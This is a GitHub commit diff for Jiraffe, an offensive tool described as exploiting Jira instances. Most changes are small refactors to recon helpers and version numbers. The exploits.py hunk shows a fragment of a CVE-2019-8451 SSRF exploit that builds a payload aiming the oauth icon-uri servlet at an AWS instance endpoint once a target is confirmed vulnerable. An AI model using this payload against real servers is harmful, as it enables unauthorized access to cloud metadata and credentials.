patch+bump: refactored exploits, recon-utils; generated code-coverage…

… metrics
0x48piraj · May 8, 2021 · 4d76345 · 4d76345
1 parent 8180bec
commit 4d76345
Show file tree

Hide file tree

Showing 7 changed files with 43 additions and 14 deletions.
diff --git a/.gitignore b/.gitignore
@@ -47,4 +47,5 @@ Session.vim
 .netrwhist
 *~
 
-/Jiraffe/*.bak
+/jiraffe/*.bak
+build-scripts
diff --git a/README.md b/README.md
@@ -12,11 +12,9 @@
 <a href="https://github.com/0x48piraj/Jiraffe/issues?q=is%3Aissue+is%3Aclosed">
   <img src="https://img.shields.io/github/issues-closed-raw/0x48piraj/Jiraffe?color=dark-green&label=issues%20fixed">
 </a>
-<!-- 
-<a href="https://travis-ci.com/0x48piraj/Jiraffe">
-    <img src="https://img.shields.io/travis/com/0x48piraj/Jiraffe.svg?color=dark-green&label=tests">
+<a href="https://github.com/0x48piraj/Jiraffe/tree/master/tests">
+    <img src="https://raw.githubusercontent.com/0x48piraj/Jiraffe/master/assets/cov.svg">
 </a>
- -->
 
 <p align="center">
 <img alt="Jiraffe" src="https://raw.githubusercontent.com/0x48piraj/Jiraffe/master/assets/jiraffe-cover.png"><br>

diff --git a/assets/cov.svg b/assets/cov.svg
diff --git a/jiraffe/__init__.py b/jiraffe/__init__.py
@@ -2,4 +2,4 @@
 # -*- coding: utf-8 -*-
 
 name = "jiraffe"
-__version__ = "2.0.5"
+__version__ = "2.0.6"
diff --git a/jiraffe/exploits.py b/jiraffe/exploits.py
@@ -49,7 +49,7 @@ def cve2019_8451(target, ssrf='https://google.com'):
 	if '"rc":200' in response and res.status_code == 200 and 'set-cookie' in response:
 		print(style.GREEN("[+] Target found vulnerable to CVE-2019-8451") + style.RESET(''))
 		print(style.YELLOW("[*] Detecting target's hosting service ...") + style.RESET(''))
-		if isaws(target.split('://')[1]): # dirty but works reliably
+		if isaws(target):
 			print(style.GREEN("[+] Target is hosted on Amazon AWS") + style.RESET(''))
 			print(style.YELLOW("[*] Testing AWS SSRF payloads ...") + style.RESET(''))
 			payload = target + "/plugins/servlet/oauth/users/icon-uri?consumerUri=" + AWS_INSTANCE

diff --git a/jiraffe/recon.py b/jiraffe/recon.py
@@ -10,19 +10,28 @@
 
 def uparse(target):
 	url = urlparse(target)
-	return url.scheme + "://" + url.netloc + url.path if url.path else "" # BASE URL
+	if url.path:
+		if url.path == "/":
+			print("[-] Target URL doesn't seems to be correct.\n\t\tValid Target URL Paths: http(s)://target.com/.../(login.action;/view.action;/viewpage.action;/releaseview.action;/aboutconfluencepage.action;/secure/Dashboard.jspa)")
+			return url.scheme + "://" + url.netloc + url.path
+		else:
+			return url.scheme + "://" + url.netloc + url.path
+		return 
+	else:
+		print("[-] Target URL doesn't seems to be correct.\n\t\tValid Target URL Paths: http(s)://target.com/.../(login.action;/view.action;/viewpage.action;/releaseview.action;/aboutconfluencepage.action;/secure/Dashboard.jspa)")
+		return url.scheme + "://" + url.netloc
 
 def request(target):
 	UA = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1"
 	headers = {'X-Atlassian-Token':'no-check', 'User-Agent':UA}
 	try:
 		r = requests.get(target, headers=headers)
 	except Exception as e:
-		print("Problem with the HTTP request.", e, sep="\n")
+		print("[-] Problem with the HTTP request.", e, sep="\n")
 		if r.status_code != 200:
-			print("Something went wrong! (STATUS {})".format(r.status_code))
+			print("[-] Something went wrong! (STATUS {})".format(r.status_code))
 			if r.status_code == 302:
-				print("HTTP request got redirected. Set this instead: " + r.headers['Location'])
+				print("[*] HTTP request got redirected. Set this instead: " + r.headers['Location'])
 		exit(1) # https://stackoverflow.com/a/2434619
 
 	return r, r.text
@@ -37,7 +46,8 @@ def isjira(target):
 		return False
 
 def isaws(target):
-	data = socket.gethostbyaddr(target)
+	target = urlparse(target)
+	data = socket.gethostbyaddr(target.netloc)
 	if "amazonaws" in str(data):
 		return True
 	else:
@@ -48,7 +58,6 @@ def getversion(target): # ENUM #1: Jira version appears to be ____
 	f_build = '0.0.0' # default
 	vers = []
 	final_version = ""
-	target = target + urlparse(target).path if "/login.jsp" in urlparse(target).path else target + '/login.jsp'
 	res, response = request(target)
 	soup = bs4.BeautifulSoup(response, "html.parser")
 	try:

diff --git a/setup.py b/setup.py
@@ -15,7 +15,7 @@
 # call to setup()
 setup(
     name="jiraffe",
-    version="2.0.5",
+    version="2.0.6",
     description="One stop place for exploiting all Jira instances in your proximity.",
     long_description=README,
     long_description_content_type="text/markdown",